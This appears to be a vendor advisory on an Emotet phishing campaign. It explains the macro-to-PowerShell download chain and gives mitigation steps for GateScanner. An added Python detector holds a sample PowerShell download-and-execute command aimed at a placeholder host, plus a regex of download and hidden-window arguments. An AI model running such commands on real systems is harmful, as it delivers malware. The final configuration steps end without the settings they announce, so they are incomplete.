Emotet Campaign - Guidance to GateScanner Users
Emotet, one of the most famous and dangerous Trojans, has lately been spotted as part of a mass phishing campaign. The campaign consists of an email carrying a Microsoft Office document which, when opened, displays an Office 365 error message generated by an obfuscated macro script. The user is then asked to “Enable Content”.
Once enabled, the macro launches a PowerShell script that downloads a malicious executable from a web server.
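The infection chain above (an Office process spawning PowerShell that reaches out to a web server) leaves a recognizable trace in endpoint process-creation telemetry. The following is an added example, not part of the original guidance or of GateScanner: a small Python detector run over constructed, Sysmon-style process-creation events. Field names (`parent`, `image`, `cmdline`) and the sample events are assumptions made for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample events (simplified Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/stage2')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command Get-Process"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo test"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},
]

# Office applications that should rarely, if ever, spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a download-and-execute stage or of
# attempts to hide the console window / evade policy.
SUSPICIOUS_ARGS = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|net\.webclient|"
    r"start-bitstransfer|\biex\b|-enc\b|-encodedcommand|-w(indowstyle)? hidden)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return 'high', 'medium' or None for one process-creation event."""
    if basename(event["parent"]) not in OFFICE_PARENTS:
        return None
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return None
    # Office -> script host alone is worth a look; download/obfuscation
    # arguments on top of it match the macro-to-PowerShell chain described above.
    return "high" if SUSPICIOUS_ARGS.search(event["cmdline"]) else "medium"


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, severity) for every event that triggers."""
    hits = []
    for idx, event in enumerate(events):
        severity = classify(event)
        if severity:
            hits.append((idx, severity))
    return hits
```

On the constructed sample, only the Word-to-PowerShell download event and the Excel-to-cmd event are flagged; the printing helper spawned by Word and the interactive PowerShell session are not.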
What makes Emotet so dangerous is that it can act like a worm and spread itself across local networks, which makes it extremely hard to clean up and eradicate from the system.
Emotet has been found to deliver a variety of malicious payloads, including Conti, Trickbot, Qbot and Ryuk ransomware. More details (including technical details) about Emotet can be found here.
Mitigation
To minimize the risk of Emotet infection, users are advised to follow basic best practices for suspicious emails, such as not downloading attachments or clicking links, and of course not to “Enable Content” in MS Office documents that were downloaded. On top of that, keeping AV definitions in GateScanner systems up to date will most likely allow these malicious files to be detected. Moreover, GateScanner can detect and eliminate the malicious content even when there is no antivirus signature for the file or its malicious content.
To do that, you need to set a policy that uses the Doc-Reformer conversion engine:
In the Convert tab (12), check the following check-boxes:
Then, in the Doc tab (5), set the following settings: